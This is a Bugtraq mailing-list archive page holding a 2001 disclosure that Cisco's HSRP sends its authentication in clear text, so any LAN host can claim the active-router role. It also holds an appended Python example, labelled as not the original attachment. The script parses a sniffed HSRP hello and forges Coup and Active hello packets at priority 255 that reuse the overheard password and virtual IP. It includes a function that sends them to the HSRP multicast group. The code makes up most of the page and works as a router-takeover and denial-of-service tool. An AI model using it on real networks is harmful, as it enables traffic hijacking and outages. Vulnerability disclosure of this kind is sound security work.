Bugtraq mailing list archives
Cisco HSRP Weakness/DoS
From: bashis <bash () NS WCD SE>
Date: Thu, 3 May 2001 19:57:41 +0200
Hi,

I was playing with Cisco's HSRP (Hot Standby Routing Protocol), and there is a (major) weakness in that protocol that allows any host in a LAN segment to make an HSRP DoS.

A (very) short explanation of HSRP: HSRP uses UDP on port 1985 to multicast address 224.0.0.2, and the authentication is in clear text (default: cisco).

I include a small program that sends out a fake HSRP packet when it hears a legal HSRP packet, as "proof of concept" code...

Vendor was notified about this on 14 April 2001, and their response was to use HSRP with IPSec.
http://www.cisco.com/networkers/nw00/pres/2402.pdf

[cut from src]

/*
 * Description:
 * This code listens for any HSRP packet; when it hears one HSRP packet,
 * it captures it, modifies some of the HSRP protocol parameters, and sends out
 * a fake HSRP packet that tells the other routers that I am the active router,
 * I have the highest priority and you should be 'Standby' or silent..
 *
 * If the other, legal active router has the highest possible
 * priority (255), then they will fight.. ;-) , AND it seems
 * in my tests that the legal router who 'wishes' to be active router
 * IS already active, so no DoS will occur. (only UDP flood from both)
 */

--
\0x62\0x61\0x73\0x68\0x69\0x73
Attachment:
hsrp-dos.tgz
Description: gzip compressed data, deflated, last modified: Thu May 3 20:02:56 2001, os: Unix
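The HSRP v1 exchange the post describes, as an added example that is not bashis's code and not the contents of hsrp-dos.tgz. It encodes the 20-byte HSRP v1 packet from RFC 2281 (version, opcode, state, hello/hold timers, priority, group, an 8-byte cleartext authentication field and the virtual IP), parses a constructed "legal" hello, and forges the takeover pair the PoC sends: a Coup followed by an Active hello at priority 255 that reuses the group, the cleartext password and the virtual IP copied straight from the sniffed packet, which is why the authentication field gives no protection. The sample packet, the 10.0.0.x addresses and the function names are assumptions made here for illustration; `wins_election` implements the RFC 2281 rule that a priority tie is broken by the higher primary IP address, which is the case behind the "they will fight" remark when the legitimate router already runs at 255.

```python
import socket
import struct

# HSRP v1 on the wire (RFC 2281): UDP source and destination port 1985,
# destination 224.0.0.2, fixed 20-byte payload, no integrity protection.
HSRP_FMT = "!BBBBBBBB8s4s"        # ver, op, state, hello, hold, prio, group, rsvd, auth, vip
HSRP_LEN = struct.calcsize(HSRP_FMT)   # 20
HSRP_PORT = 1985
HSRP_MCAST = "224.0.0.2"

OP_HELLO, OP_COUP, OP_RESIGN = 0, 1, 2
STATE_STANDBY, STATE_ACTIVE = 8, 16
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}

# Constructed sample (assumption, not a real capture): an Active hello for group 1,
# priority 100, default password "cisco", virtual IP 10.0.0.1.
SAMPLE_HELLO = bytes.fromhex("000010030a640100" "636973636f000000" "0a000001")


def parse_hsrp(pkt):
    """Decode one HSRP v1 packet into a dict; rejects short or non-v1 payloads."""
    if len(pkt) < HSRP_LEN:
        raise ValueError("short HSRP packet (%d bytes)" % len(pkt))
    ver, op, state, hello, hold, prio, group, _rsvd, auth, vip = struct.unpack(HSRP_FMT, pkt[:HSRP_LEN])
    if ver != 0:
        raise ValueError("unsupported HSRP version %d" % ver)
    return {
        "version": ver, "opcode": op, "state": state,
        "hellotime": hello, "holdtime": hold, "priority": prio, "group": group,
        "auth": auth.rstrip(b"\x00").decode("ascii", "replace"),   # sent in clear text
        "virtual_ip": socket.inet_ntoa(vip),
    }


def build_hsrp(opcode, state, priority, group, auth, virtual_ip, hellotime=3, holdtime=10):
    """Encode an HSRP v1 packet. The auth field is 8 bytes, zero padded, plain text."""
    auth_bytes = auth.encode("ascii")
    if len(auth_bytes) > 8:
        raise ValueError("HSRP auth data is at most 8 bytes")
    return struct.pack(HSRP_FMT, 0, opcode, state, hellotime, holdtime, priority, group, 0,
                       auth_bytes.ljust(8, b"\x00"), socket.inet_aton(virtual_ip))


def forge_takeover(captured):
    """What the PoC does with a sniffed hello: keep group, password and virtual IP,
    claim Active at the maximum priority 255. Returns (coup, hello) to send in that order."""
    seen = parse_hsrp(captured)
    fields = dict(priority=255, group=seen["group"], auth=seen["auth"],
                  virtual_ip=seen["virtual_ip"],
                  hellotime=seen["hellotime"], holdtime=seen["holdtime"])
    return (build_hsrp(OP_COUP, STATE_ACTIVE, **fields),
            build_hsrp(OP_HELLO, STATE_ACTIVE, **fields))


def wins_election(attacker_prio, attacker_ip, router_prio, router_ip):
    """RFC 2281 precedence: higher priority wins; on a tie the higher primary IP wins.
    So a priority-255 attacker with a low address cannot beat a priority-255 router."""
    if attacker_prio != router_prio:
        return attacker_prio > router_prio
    return socket.inet_aton(attacker_ip) > socket.inet_aton(router_ip)


def send_hsrp(packets, iface_ip=None):
    """Emit packets to the HSRP group (needs a LAN; never called at import time).
    HSRP peers send from and to UDP 1985, so bind the source port as well."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    if iface_ip:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(iface_ip))
    s.bind(("", HSRP_PORT))
    for p in packets:
        s.sendto(p, (HSRP_MCAST, HSRP_PORT))
    s.close()


if __name__ == "__main__":
    seen = parse_hsrp(SAMPLE_HELLO)
    print("heard: %s/%s prio=%d group=%d auth=%r vip=%s" % (
        OPCODES[seen["opcode"]], STATES[seen["state"]], seen["priority"],
        seen["group"], seen["auth"], seen["virtual_ip"]))
    for pkt in forge_takeover(SAMPLE_HELLO):
        f = parse_hsrp(pkt)
        print("forged: %s/%s prio=%d  %s" % (OPCODES[f["opcode"]], STATES[f["state"]],
                                             f["priority"], pkt.hex()))
```

Running the script only decodes the sample and prints the forged pair; `send_hsrp` is left for use on a test segment. The offline checks are the point: every field the forged packets carry, including the password, comes from the packet that was overheard.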
Current thread:
- Cisco HSRP Weakness/DoS bashis (May 03)
- <Possible follow-ups>
- Re: Cisco HSRP Weakness/DoS Steven M. Bellovin (May 03)
- Re: Cisco HSRP Weakness/DoS bashis (May 05)
- Re: Cisco HSRP Weakness/DoS Damir Rajnovic (May 16)